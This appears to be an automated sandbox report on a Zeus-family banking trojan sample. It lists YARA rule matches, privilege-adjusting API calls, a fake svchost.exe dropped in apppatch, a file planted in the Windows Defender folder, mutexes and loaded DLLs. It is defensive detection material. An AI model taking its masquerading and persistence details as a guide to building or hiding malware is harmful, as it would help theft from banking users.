Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2936, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1756, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1812, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5612, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 3964, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: uavINoSIQh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@10/50@2167/24
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_00401E00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00401E00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02665930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_02665930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01345930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_01345930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_01405930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_01405930
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01535930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,8_2_01535930
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\lymyxid.comJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\login[1].htmJump to behavior
Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\75775A6Fa
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4084
Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4628
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1756
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2604
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1812
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1900
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6304
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile created: C:\Users\user\AppData\Local\Temp\9648.tmpJump to behavior
Source: uavINoSIQh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\uavINoSIQh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: uavINoSIQh.exeReversingLabs: Detection: 84%
Source: uavINoSIQh.exeString found in binary or memory: -help
Source: svchost.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile read: C:\Users\user\Desktop\uavINoSIQh.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\uavINoSIQh.exe "C:\Users\user\Desktop\uavINoSIQh.exe"
Source: C:\Users\user\Desktop\uavINoSIQh.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 752
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 820
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 3712
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 656
Source: C:\Users\user\Desktop\uavINoSIQh.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: inetres.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetres.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: symsrv.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeSection loaded: winhttp.dllJump to behavior
